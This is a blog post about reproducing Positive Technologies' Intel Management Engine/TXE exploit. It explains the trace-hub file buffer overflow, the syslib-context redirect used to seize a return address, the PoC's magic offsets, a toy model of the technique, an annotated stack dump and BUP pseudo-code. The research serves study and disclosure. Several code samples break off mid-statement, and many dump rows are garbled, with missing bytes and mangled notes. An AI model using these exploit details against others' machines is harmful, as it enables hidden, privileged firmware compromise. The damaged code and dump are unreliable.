Exploiting Intel’s Management Engine, Hacker News

Let me tell you a story…. (I think I’ll start all my blog posts with that considering how long they always end up being)

I’ve been working for a while now on reproducing the Intel vulnerability that PT Research disclosed at BlackHat Europe 2017. I’ve succeeded, and I want to share my journey and experience with everyone, in the hope that it helps others take control of their machines (and not the other way around).

First, for those who are unaware, Positive Technologies (referred to here as ‘PT Research’, ‘PT Security’ or just ‘PT’) released information at BlackHat 2017 about a way to run unsigned code on the Intel Management Engine. And for those who are unaware, the Intel ME is a ‘security’ processor that runs on every Intel chip (since 2006) and that supposedly has full access to our systems. You can read more about it here and here, but the description that I’ve read and that stuck the most with me is this one from Libreboot’s FAQ (though it is a little outdated).

What’s the Intel Management Engine?

In summary, the ME (Management Engine) is a second processor embedded in every PCH (the motherboard’s chipset) which runs with the highest privilege possible. It runs its own Intel-signed firmware and takes care of a lot of things that you don’t know it does, the best-known one being AMT (Intel Active Management Technology), which allows a system administrator to remotely access, control, update, reformat, KVM, etc. a computer through the network, even if the computer is turned off. It’s called “out-of-band” management, because it doesn’t rely on software running on the main CPU (like TeamViewer, Skype remote desktop or anything like that); it works even if your entire OS is corrupted, or has a virus, or the machine is actually turned off.

That’s pretty scary, and if you’re wondering why Intel did this, the rationale is that when you’re a system administrator in a company that has thousands of computers, or a university, or even a small business with a dozen computers, and you want to update them all to a newer security update or whatever, you can do it all at once from the comfort of your chair. You don’t need to go through the entire building, insert a USB key into each machine, turn on those machines that were powered off, etc. The real question, however, is why the option to disable the ME is not available to consumers. As a regular user, I don’t need that ability to remotely control my machine, so I want to disable it, but I can’t. This has led to a lot of FUD (Fear, Uncertainty & Doubt) surrounding the ME as a way for Intel to control the world!

I wanted to figure out what was true and what wasn’t as I dug deep into reverse engineering and poking at the ME. The ME does have a legitimate function, but it does so much more now: it takes care of the hardware initialization, the main CPU boot-up, control of the clock registers, DRM management for audio / video, software-based TPM and more. Those extra tasks are supposedly why it cannot be deactivated on consumer products. It unfortunately also means that you have to trust that Intel isn’t doing anything malicious (or allowing others to do something malicious through their incompetence). It’s not that I think Intel are malicious, but that doesn’t mean I trust them implicitly either. I started looking into the ME, trying to get my code to execute on it using the exploit PT had divulged, and I took on the mission of getting the ME to control and spy on my USB devices. This started when I was still working with Purism, but even after I left that company, I continued working on this, on and off, for a little over a year, and I’ve finally made enough progress that I think it warrants writing something about it. Especially since I’ve ‘revived’ this blog in the last month with a couple of posts about reverse engineering too.

First things first. The Intel Management Engine (IME) or Management Engine (ME) is also called the CSME (Converged Security and Management Engine) or just CSE (Converged Security Engine), sometimes TXE (Trusted eXecution Engine) or SPS (Server Platform Services), and it used to be called Intel Management BIOS Extension (IMEBx). It can get quite confusing, especially considering that “the ME” can refer both to the Management Engine processor core itself and to the Management Engine firmware, which are often indistinguishable from each other. I haven’t looked at the IMEBx (it’s old) or the SPS (don’t care about servers), but I think we can safely say that the ‘CSE’ and ‘CSME’ are the hardware cores, and the ‘TXE’ and ‘ME’ are their firmwares, respectively. I’m not sure if that’s exactly true, as I’ve heard ‘CSME’ also refer to the firmware, not just the hardware, but mostly all of these terms are interchangeable and I’ve seen Intel documents use them interchangeably as well.

I can also say with fair certainty that the CSE and CSME are the same thing: they are the same hardware as far as I can see, and their firmware is pretty much the same. The CSE is used for ‘low power / cheap’ platforms, such as Celeron / Apollolake (set-top boxes, netbooks, cheap and underpowered laptops, etc.), while the CSME is used for ‘desktop / laptop’ high-end CPUs such as Skylake, Kabylake, Coffeelake, etc. The main difference between the two is that the CSE doesn’t include AMT (the remote administration feature) while the CSME does. The CSE runs the TXE firmware, which is the exact same as the ME firmware, but again without the AMT features. I obviously can’t try to run the ME firmware on an Apollolake with the CSE because each version will only work on one platform (hardware initialization / registers being specific to each platform), but looking at their code, I can say that they are pretty much identical: one does more than the other, but it’s the same code, same base architecture / functioning. TXE / CSE is probably just cheaper for Intel because there are fewer features for them to test / QA before release.

In this post, I will be talking about both the CSE and CSME, because PT Research has released their exploit so we can run our own code on the Apollolake platform (running TXE on CSE) and what I’ve done is both play with that and also port it to work on the Skylake platform (running ME on CSME).

Understanding the CSE exploit in order to do the CSME exploit

The first thing I want to explain is how to run your own code on the CSE (TXE v3.0). This will be pretty long, so I think I’ll divide this article into 3 posts, one that I will try to write each day. First, understanding the CSE exploit, then porting the exploit to CSME, then how to play around with the USB controller through the ME.

You can already refer to Positive Technologies’ presentation (given by Mark Ermolov and Maxim Goryachy) at BlackHat Europe 2017. You can download their slides here and presentation here. It explains (mostly) everything you need to do. Then you can have a look at their Proof of Concept release of the exploit on github for Apollolake systems.

Before you go further, this post isn’t going to be like my previous posts that try to explain things on a very basic level (and often fail at remaining basic the further along you read). This is going to get very technical very fast, and before you continue, you need to read and understand the exploit as explained in the presentation by PT linked above. If you can’t follow it, then you’re just going to get lost, as I am assuming that you’ve read it and understood it all.

Here’s a quick summary of the exploit PT have divulged in their presentation:

While most partitions are signed and cannot be modified as they contain code, the MFS partition is not signed and can therefore be modified by us mortals. Additional restrictions in it mean that not all of the files are user-modifiable.
A file in the MFS partition named "/home/bup/ct" is used to initialize the Trace Hub Configuration of the ME and is user-modifiable.
The ME process BUP (Hardware Bring-UP) reads the entire "/home/bup/ct" file into a buffer of size 808 without checking that the file will fit: we have a buffer overflow exploit here.
There is a security-cookie / stack-guard that protects the ME against buffer overflows, making the buffer overflow exploit useless on its own.
At the very bottom of the stack (the first 0x18 bytes of the stack) resides the TLS structure (Thread Local Storage) which contains a pointer to the syslib context.
The "/home/bup/ct" file is read in chunks of 64 bytes, and copied into a shared memory block.
Writing to the shared memory block (with the sys_write_shared_mem function) causes it to read the destination address from the shared memory block descriptor that resides in the syslib context structure.
Overwriting the stack all the way to the bottom in order to overwrite the syslib context, pointing it to a custom-made shared memory block which has the destination address pointing to the memcpy’s return address, lets us control where we want the function to return, thus bypassing the security-cookie / stack-guard protection that is in place.
By using both the buffer overflow exploit and the TLS / syslib-context / shared-memory exploit, we can control the code that gets executed using ROPs: running our own unsigned code.
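The redirect trick in the steps above can be illustrated with a toy model. This is only a sketch under loud assumptions: the memory layout (`BUF`, `DESC`, `RET`), the 4-byte descriptor and the `chunked_write` helper are all made up for illustration and are not the ME's real structures or PT's code. It only shows why a copy that re-reads its destination before every 64-byte chunk can be steered onto a return address once an earlier chunk has overwritten the descriptor.

```python
CHUNK = 64  # chunk size quoted in the summary above


def chunked_write(mem, desc_addr, data):
    """Copy data in CHUNK-sized pieces. Before each piece, the destination
    base is re-read from the 4-byte descriptor at desc_addr (a toy stand-in
    for the shared memory block descriptor)."""
    for off in range(0, len(data), CHUNK):
        piece = data[off:off + CHUNK]
        base = int.from_bytes(mem[desc_addr:desc_addr + 4], "little")
        mem[base + off:base + off + len(piece)] = piece


# Hypothetical layout: buffer at 0x00, descriptor at 0x40, return slot at 0x100.
BUF, DESC, RET = 0x00, 0x40, 0x100
mem = bytearray(0x200)
mem[DESC:DESC + 4] = BUF.to_bytes(4, "little")      # legitimate destination
mem[RET:RET + 4] = (0x1111).to_bytes(4, "little")   # legitimate return address

payload = bytearray(3 * CHUNK)
# Chunk 1 overflows onto the descriptor: redirect it so chunk 2 lands on RET.
payload[CHUNK:CHUNK + 4] = (RET - 2 * CHUNK).to_bytes(4, "little")
# Chunk 2 carries the value we want in the return slot.
payload[2 * CHUNK:2 * CHUNK + 4] = (0xDEAD).to_bytes(4, "little")

chunked_write(mem, DESC, bytes(payload))
ret = int.from_bytes(mem[RET:RET + 4], "little")
print(hex(ret))  # 0xdead
```

The point of the toy is that the technique needs at least two separate writes: one to corrupt the descriptor, and a later one that uses the corrupted destination.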

Using another presentation from Positive Technologies, this time at the 34th Chaos Communication Congress, we can see that the Intel chipsets support JTAG, which allows full debugging capabilities. In order to be able to JTAG the ME core itself, we would need to have ‘RED’ level unlock. See this helpful little table, taken from yet another Positive Technologies presentation (BlackHat Asia 2019).

All we need to do to enable RED unlock is to write the value 3 to the DfX Aggregator register. That’s pretty easy to do once we have our own code running on the ME, so we can create a ROP chain that enables DCI and Red Unlock mode and gives us full ME JTAG control from another PC over USB.

Something you might not realize at first (and I didn’t until I dug deep) is that the exploit explained in the BlackHat Europe 2017 presentation is very different from what they’ve released as their proof of concept. The buffer overflow in reading the "/home/bup/ct" file is the same, but that’s the easy part (hard to find, but easy to use: write a file with a size of more than 808 bytes). I don’t know why, don’t ask, and I haven’t asked them either, but they decided to release the proof of concept for Apollolake (TXE 3.x) rather than for Skylake (ME 11.x), even though their presentation was about how to exploit it on Skylake. I figured that if I wanted to port their exploit to Skylake, I needed to first understand how it works on Apollolake, then it should just be a matter of finding the right offsets for my version of the ME on Skylake, right?… No. It actually took me a long time to figure out that what they are doing is a different exploit. In their presentation they were talking about how they overwrite the TLS with the syslib context in order to take over the shared memory destination address, so they can control the memcpy to overwrite their function’s return address and bypass the stack guard security cookie.

The problem with that method is that it requires two reads: the first one to overwrite the TLS / syslib context, and the second one to cause the memcpy operation that lets the exploit happen. On Skylake, it’s not a problem: the "/home/bup/ct" file gets read in chunks of 64 bytes, so you overwrite the syslib context with one chunk, then you overwrite your return address with the next chunk. On Apollolake, unfortunately, it doesn’t seem to use chunked reads. Because it’s a simplified firmware, I assume the MFS (ME File System) on the flash is different, and the file is read in one shot. Which means that the exploit in the presentation cannot be used. So… what do they do?

The TXE Exploit

If you follow the instructions in their IntelTXE-PoC repository, you’ll see that the entire TXE exploit is stored in the "/home/bup/ct" file (Trace Hub Configuration) which gets generated by the me_exp_bxtp.py script. That’s the file you generate, and by configuring the ME using Intel’s tools and setting the CT file in the “Trace Hub Configuration” field, the exploit happens. But what does it do exactly? What’s in that file? The script that generates it unfortunately has a few magic numbers that took me a long time to figure out. Let’s look at them:

    STACK_BASE = 0x56000
    BUFFER_OFFSET = 0x380
    SYS_TRACER_CTX_OFFSET = 0x200
    SYS_TRACER_CTX_REQ_OFFSET = 0x55c58
    RET_ADDR_OFFSET = 0x338

    def GenerateTHConfig():
        print("[*] Generating fake tracehub configuration...")
        trace_hub_config = struct.pack("[…]

I've ignored the ROPs, they're not important for now, but let's look at the magic numbers. First, the STACK base address is 0x56000, cool, good to know... where did they find it? No idea! Why is the buffer offset 0x380? What's this 0x55c58 address that is SYS_TRACER_CTX_REQ_OFFSET? Why is the RET_ADDR_OFFSET set to 0x338? And then there are all those magic values in the GenerateTHConfig function. At first, I thought that it was just a valid Trace Hub file and that if it didn’t start with those values, it would be rejected, but it turns out those values are important for the exploit to happen. Then that magic value 0x00016e1a that gets written on line 27 of the sample above... what is that?
This article will answer all of those questions, as I’ve worked on reverse engineering the exploit itself. I will spare you all the reverse engineering and research I did on the ME itself in order to understand how the kernel creates its processes, how / where it sets up the stack, and how the TLS structure gets created and by whom (I wasted too much time looking at the kernel instead of just concentrating on the BUP process itself). I'll look at that a little bit more in the next post.
After the exploit ran and I had a halted ME thread in the python console, I used the JTAG commands and dumped the stack to see what functions had run. I could follow every call that way and figure out what happened and who called whom until the exploit was triggered. It's probably a bit hard to read and I'm not going to try and explain it, but here's the dump of the stack with my notes on the side showing which variables, registers and return addresses appear on each line:
    01BF:0000000000055950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055960: 00 00 00 (cc) 05 00 C8 59 05 00 18 00 00 00 - garbage - push edi (in _memset_0)
    01BF:0000000000055970: DC 18 00 00 40 30 09 00 ff ff ff ff 18 00 00 00 - retaddr to _memset_0 - ebx (addr) - push 0xffffff (value) - push edi (length)
    01BF:0000000000055980: 11 00 00 (D1) 00 00 22 00 00 (B1) 00 00 - previously pushed ecx - ebx - esi - edi
    01BF:0000000000055990: (5A) 00 (6D) 00 04 30 09 (D1) 00 00 - ebp 0x0 (a) - retaddr to sub_1119 - var_54 - ebx
    01BF:00000000000559A0: B0 02 00 (3c 5a) (D0 4D) 00 70 5A 05 00 - eax - LOCALS [0x54]
    01BF:00000000000559B0: 04 30 09 00 44 90 09 00 D0 01 00 (D2) 00 00
    01BF:00000000000559C0: 21 00 00 00 6F 03 00 00 FF 03 00 00 00 00 00 00
    01BF:00000000000559D0: ff ff ff ff 00 00 00 00 84 30 09 00 84 30 09 00
    01BF:00000000000559E0: 04 30 09 (E1) 00 00 02 01 00 00 91 00 00 00
    01BF:00000000000559F0: D0 01 00 00 20 8e ff 6e 44 90 09 00 80 03 00 00 - LOCALS [0x54] - ebx - esi
    01BF:0000000000055A00: 00 30 09 00 (5A) (ee 6e) 00 44 90 09 00 - EDI - EBP 0x0 (a) - retaddr to sub_6CA2 - ebx
    01BF:0000000000055A10: 04 30 09 00 00 04 00 00 (4c) (E0) 00 00 - ecx - eax - eax - eax
    01BF:0000000000055A20: 01 00 00 00 (5A) 00 3C 5A 05 00 db f1 e8 6b - eax - eax - eax - locals [0x18]
    01BF:0000000000055A30: (5A) 00 (5A) (1D) 01 00 03 00 00 00
    01BF:0000000000055A40: (5A) 00 EA 34 01 00 04 00 00 00 58 5A 05 00 - LOCALS [0x18] - ebx - esi - ebp ** INVALID STACK ABOVE THIS POINT
    01BF:0000000000055A50: BD 25 01 00 20 8e ff 6e (5A) 00 00 00 00 00 - retaddr to sys_get_ctx_struct_addr ** INVALID STACK ABOVE THIS POINT
    01BF:0000000000055A60: D8 5A 05 00 A4 5A 05 (4A 2A) 00 72 5a 05 00 - INVALID - ebp - retaddr to sub_134C6 - ebx
    01BF:0000000000055A70: 20 00 43 02 00 02 08 00 0e 00 56 00 02 00 86 80 - LOCALS [0x2C]
    01BF:0000000000055A80: 80 03 00 00 04 00 00 00 (5A) (1d) 01 00
    01BF:0000000000055A90: 03 00 00 00 A0 5A 05 00 20 8e ff 6e 8c 5a 05 00 - LOCALS [0x2C] - ebx
    01BF:0000000000055AA0: 44 37 09 00 B8 5A 05 00 E5 2B 01 (0e) 56 00 - esi - ebp - retaddr to sub_129C9 - arg0 ** INVALID STACK HERE AND ABOVE
    01BF:0000000000055AB0: 04 00 00 (C8 5A) 00 10 6C 00 00 00 00 00 00 - 4 - ebp 0x55aC8 sub_6A68 - retaddr to sub_6A50 - eax
    01BF:0000000000055AC0: 0E 00 56 00 0e 00 00 (F8 5A) 00 62 84 00 00 - X - X - ebp 0x55AF8 sub_8309 - retaddr to sub_6a68
    01BF:0000000000055AD0: 80 03 00 00 00 8e ff 6e 8c 5a 05 00 80 03 00 00 - LOCALS [0x1C]
    01BF:0000000000055AE0: 44 37 09 00 28 5b 05 00 20 8e ff 6e 00 00 00 00 - LOCALS [0x1C] - ebx
    01BF:0000000000055AF0: 80 03 00 00 44 37 09 00 (5b) 00 2A 81 02 00 - esi - edi - ebp 0x55B (sub _) E - retaddr to sub_6082
    01BF:0000000000055B00: 44 37 09 00 00 03 00 00 00 00 00 00 29 9a 07 00 - edi - LOCALS [0x18]
    01BF:0000000000055B10: 80 03 00 00 44 37 09 00 20 8e ff 6e 80 03 00 00 - LOCALS [0x18] - ebx
    01BF:0000000000055B20: 29 8a 07 00 64 5C 05 00 (5b) 00 28 99 02 00 - esi - edi - ebp 0x55B90 bup_read_mfs_file - retaddr to sub_2A678
    01BF:0000000000055B30: (9a) 00 80 03 00 00 02 00 00 00 00 03 00 00 - a1 - src_size (0x380) - sm_block_id (2) - proc_thread_id (0x300)
    01BF:0000000000055B40: 00 03 00 00 00 00 00 00 01 00 00 00 ff ff ff ff - proc_thread_id - a6, a7, a8
    01BF:0000000000055B50: 00 00 00 00 01 00 00 00 00 00 00 00 (5b) 00 - A9 - 10 - LOCALS [0x2C] - ebp 0x (b) _get_tls_slot
    01BF:0000000000055B60: 1D 84 01 00 03 00 00 00 8c 5b 05 00 EA 34 01 00 - retaddr to get_tls_slot - arg0 (3), ebp 0x55B8C sub_134C6 - retaddr to sub_13495
    01BF:0000000000055B70: 04 00 00 00 (5b) (BD) 01 00 (8e ff 6e - X - ebp 0x) (b) (sub _) - retaddr to sys_get_ctx_struct_addr - COOKIE ** INVALID
    01BF:0000000000055B80: 9A 5B 05 00 00 00 00 00 04 00 00 (cc 5b) 00 - LOCALS [0x2C] - ebx - esi - ebp 0x55bcc sub_129C9
    01BF:0000000000055B90: 4A 2A 01 00 9A 5B 05 (AC 5B) 02 00 02 08 00 - retaddr to sub_134C6
    01BF:0000000000055BA0: 01 00 56 00 02 00 86 80 64 5C 05 00 (5c) 00
    01BF:0000000000055BB0: 81 13 03 00 02 00 00 (5f) (6b) 00 65 00 00
    01BF:0000000000055BC0: 20 8e ff 6e (5A) 00 00 00 00 (E0 5B) 00 - LOCALS - - ebp 0x (BCC sub _) BD6 ** INVALID
    01BF:0000000000055BD0: E5 2B 01 00 01 00 56 00 F4 5B 05 (AE 6F) 00 - retaddr to sub_129C9 * INVALID - X - ebp 0x55bf4 sub_6F3D - retaddr 0x6fae to sub_6A50
    01BF:0000000000055BE0: 00 00 00 00 02 00 00 00 01 00 56 00 02 00 00 00 - add esp, 0C - ebx
    01BF:0000000000055BF0: (5c) 00 (5c) 00 BC 7A 00 00 00 00 00 00 - esi - ebp 0x C) sub_7A91 - retaddr 0x7abc to sub_6f3D
    01BF:0000000000055C00: 00 00 00 00 00 00 00 00 00 00 E0 (E4 9b) 00
    01BF:0000000000055C10: 00 00 00 00 20 8e ff 6e 02 00 00 00 (5c) 00
    01BF:0000000000055C20: 04 00 05 00 40 5C 05 00 9c 7c 00 00 00 00 00 00 - LOCAL - ebp 0x55C40 sub_7C88 - retaddr 0x7c9c to sub_7A91
    01BF:0000000000055C30: 04 00 00 (0a) 05 00 00 00 00 (E4 9B) 00
    01BF:0000000000055C40: 50 5C 05 (5e) 00 (0a) 05 00 E4 9B 04 00 - ebp 0x55C (sub _) - retaddr 0x695e to sub_7C88
    01BF:0000000000055C50: B4 5F 05 00 E4 9B 04 (0a) 05 00 07 00 00 00 - ebp 0x55fb4 - retaddr 0x49be4 to sub_6078
    01BF:0000000000055C60: BF 00 00 00 80 03 00 00 07 00 00 (4b) 4f 44
    01BF:0000000000055C70: 14 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055C80: 00 00 00 00 00 00 02 00 E0 00 00 02 00 00 00 5f
    01BF:0000000000055C90: 10 00 00 02 88 08 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055CA0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055CB0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055CC0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055CD0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055CE0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055CF0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055D00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055D10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055D20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055D30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055D40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055D50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055D60: 00 00 00 00 (A8) 00 C7 00 00 00 18 10 00 00
    01BF:0000000000055D70: (A8) (C7) 00 00 08 10 00 00 01 00 00 00
    01BF:0000000000055D80: C7 00 00 00 1C 10 00 00 (A8) (C7) 00 00
    01BF:0000000000055D90: 18 10 00 00 (A8) (C7) 00 00 08 10 00 00
    01BF:0000000000055DA0: 01 00 00 00 C7 00 00 00 1C 10 00 00 00 01 00 00
    01BF:0000000000055DB0: 00 00 00 (9f) 00 00 00 00 00 00 10 10 00 00
    01BF:0000000000055DC0: (A8) (C7) 00 00 08 10 00 00 be 11 00 00
    01BF:0000000000055DD0: (A8) 00 9f 01 00 00 00 84 00 00 03 00 00 00
    01BF:0000000000055DE0: 2D A8 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055DF0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055E00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055E10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055E20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055E30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055E40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055E50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055E60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055E70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055E80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055E90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055EA0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055EB0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055EC0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055ED0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055EE0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055EF0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055F00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055F10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055F20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055F30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055F40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055F50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055F60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055F70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055F80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055F90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055FA0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055FB0: 00 00 00 00 00 00 00 00 1a 6e 01 00 98 5D 05 00 - pop ESP 0x55C98
    01BF:0000000000055FC0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055FD0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055FE0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    01BF:0000000000055FF0: 58 5A 05 00 0c 00 00 00 00 03 00 03 FC 5F 05 00
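If you want to read a dump like this without doing the little-endian conversion in your head, a few lines of Python help. This is just a convenience sketch, not part of PT's tooling: `parse_dump_row` is a hypothetical helper, and it assumes rows cleaned up into a `SEGMENT:ADDRESS: bytes - notes` shape with 16 intact bytes. The example uses the last row of the dump.

```python
import struct


def parse_dump_row(row):
    """Split one 'SEG:ADDRESS: b0 b1 ... - notes' row into (address, dwords)."""
    _segment, address, rest = row.split(":", 2)
    # Everything before the first ' - ' separator is the hex byte column.
    hex_bytes = rest.split(" - ")[0].split()
    data = bytes(int(b, 16) for b in hex_bytes)
    data = data[:len(data) // 4 * 4]  # keep whole dwords only
    dwords = struct.unpack("<%dI" % (len(data) // 4), data)
    return int(address, 16), dwords


row = "01BF:0000000000055FF0: 58 5A 05 00 0c 00 00 00 00 03 00 03 FC 5F 05 00"
addr, dwords = parse_dump_row(row)
for i, value in enumerate(dwords):
    print(hex(addr + 4 * i), hex(value))
```

Rows whose bytes are not plain hex pairs would make `int(b, 16)` raise, which is a reasonable way to notice a damaged row.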
A couple of things first:
The stack is at offset 0x56000 (the /home/bup/ct file gets read into offset 0x55C80).
We can see the call to bup_read_mfs_file (in the row at 0x55B20), but the stack is corrupted all the way to 0x55BC0, meaning that all the functions above that line had been called and had already returned when the exploit happened. According to the assembly code, the TXE doesn't read the file in chunks or copy it to shared memory afterwards, so by the time bup_dfs_read_file returns, no further memcpy on shared memory gets called and the exploit hasn't run. The reason for that is that the file isn't read into the stack and then copied to a shared memory block; instead, a shared memory block is created pointing to the stack, and reading the data puts it on the stack by using the sys_write_shared_mem function. So once the buffer overflow is done, the copy is also done.
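As a quick sanity check on those numbers, here is the arithmetic spelled out. It is only a sketch, under the assumption (taken from the sizes quoted in this post) that the generated ct file is 0x380 bytes long and ends exactly at the top of the stack.

```python
STACK_TOP = 0x56000   # stack offset quoted above
FILE_SIZE = 0x380     # size of the generated ct file (BUFFER_OFFSET in the PoC)
BUFFER_SIZE = 808     # size of the buffer the file is read into

buffer_start = STACK_TOP - FILE_SIZE        # where the file data begins
buffer_end = buffer_start + BUFFER_SIZE     # first byte past the 808-byte buffer
overflow = FILE_SIZE - BUFFER_SIZE          # bytes written past the buffer

print(hex(buffer_start), hex(buffer_end), overflow)  # 0x55c80 0x55fa8 88
```

So the file overruns the buffer by 88 bytes, which is exactly the distance from the end of the buffer to the top of the stack.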
If you're wondering what I mean by bup_dfs_read_file and bup_read_mfs_file, here's a little pseudo-code of how the TXE's BUP module initializes itself, from the entry point to the time the exploit runs (only relevant code is shown, and it's oversimplified). It shows the function calls that would appear in the stack, in the right order. If you want to follow along in IDA, it's using TXE version 3.0.1.1107:

    // sub_2604C
    // The entry point. First code executed after the kernel launches the BUP process
    void bup_entry () {
       // Initialize stack, tls, syslib, etc...
       // bup_init ();
       // then call the main function
       bup_main ();
    }

    // sub_35001
    // The main function I assume which does most of everything
    void bup_main () {
       // All sorts of initialization of stuff
       // function1 (); function2 ();
       bup_run_init_scripts ();
       // Some more stuff
       // function3 (); function4 ();
    }

    // sub_355E0
    // This runs 'scripts', it basically loops through an array of arrays
    // containing functions and calls each of those functions.
    // Each function will initialize one part of the hardware.
    void bup_run_init_scripts () {
       // Simplification of what it does
       for (int i = 0; i […]
       […]offset + offset, shmem_blockid, read_size, out_bytes_read);
       release_shared_memory_block (shmem_blockid);
       // Stack Guard
    }

    // sub_297BA
    // Read the MFS file content and copies it to shared memory
    // the function is more complex than shown, its arguments as well, I've removed anything not important.
    int bup_read_mfs_file (void *mfs_partition, int offset, int shmem_blockid, unsigned int read_size, unsigned int *out_bytes_read) {
       *out_bytes_read = read_size;
       sys_write_shared_memory (shmem_blockid, mfs_partition + offset, read_size, read_size);
       // Stack Guard
    }

    // sub_AE87
    // This is in the syslib module, not the BUP module.
    int sys_write_shared_memory (int blockid, void *src, int src_size, int write_size) {
       SHMem *block = get_shared_memory_block (blockid);
       memcpy (block->addr, src, write_size);
       // Stack Guard
    }
So, technically, according to the BlackHat presentation, when bup_read_mfs_file gets called, it reads the MFS file in chunks, and when it calls sys_write_shared_memory, it will execute our exploit. From the stack that I dumped and analyzed above, that's not what happens: I can see the stack corrupted (overwritten by subsequent calls), which proves that bup_read_mfs_file has returned before the exploit happens. Reverse engineering the code, I also see that there is no reading in chunks, which explains why things are different from the presentation. So the exploit has to happen between the call to bup_dfs_read_file and the end of bup_init_trace_hub, because the security cookie (stack guard) is destroyed by the buffer overflow, so we can't let bup_init_trace_hub return. If we look at what happens in bup_init_trace_hub after the call to bup_dfs_read_file, we see this:
    void bup_init_trace_hub () {
       char ct_data[808];
       int file_size;
       int bytes_read;

       // again, simplification
       bup_dfs_get_file_size ("/home/bup/ct", &file_size);
       bup_dfs_read_file ("/home/bup/ct", 0, ct_data, file_size, &bytes_read);

       CT *ct = (CT *) ct_data;
       for (uint16_t i = 0; i < ct->num_entries; i++) {
           if (ct->entries[i].selector == 1)
              set_segment_word (7, ct->entries[i].offset, ct->entries[i].value);
           if (ct->entries[i].selector == 2)
              set_segment_word (0xBF, ct->entries[i].offset, ct->entries[i].value);
       }
       bup_init_trace_hub_set_systracer (7, 0xBF);
    }

    // sub_49AD3
    // The following is a small function that gets called and sets flags on
    // the systracer context value and returns.
    void bup_init_trace_hub_set_systracer (unsigned int seg1, unsigned int seg2) {
       // sys_get_sys_tracer_ctx () returns syslib_context + 0x200
       char *systracer = sys_get_sys_tracer_ctx ();

       // Set the DWORD at address systracer + 0x10 to the first argument
       *(uint32_t *) (systracer + 0x10) = seg1;

       // Set bits 0 and 1 of systracer to 1 and clear bits 6 and 7
       systracer[0] |= 3;
       systracer[0] &= 0x3F;
       // set bit 6 of systracer to the same as bit 3 of 0xBF:10
       systracer[0] |= ((get_segment_word (seg2, 0x10) >> 3) & 1) […] >> 11) & 1 […]
       // set bit 9 of systracer to the same as bit 24 of 0xBF:E0
       systracer[1] |= ((get_segment_word (seg2, 0xE0) >> 24) & 1) […]
The systracer context is at syslib_ctx + 0x200, and if we look again at what the exploit from PT does, it sets the syslib_ctx to 0x55A58 so the modified data (systracer) is at 0x55C58, which happens to be the return address of the function bup_init_trace_hub_set_systracer itself. Here’s what the stack actually looks like if we follow all the push / pop / call / ret from the entry point to the moment the exploit happens:
    TXE STACK - bup_entry:
    0x56000: TOP STACK
    0x55FEC: TLS
    0x55FE8: ecx - arg to bup_main
    0x55FE4: edx - arg
    0x55FE0: eax - arg
    0x55FDC: retaddr - call bup_main
      0x55FD8: saved ebp of bup_entry
      0x55FD4: 0 - arg to bup_run_init_scripts
      0x55FD0: retaddr - call bup_run_init_scripts
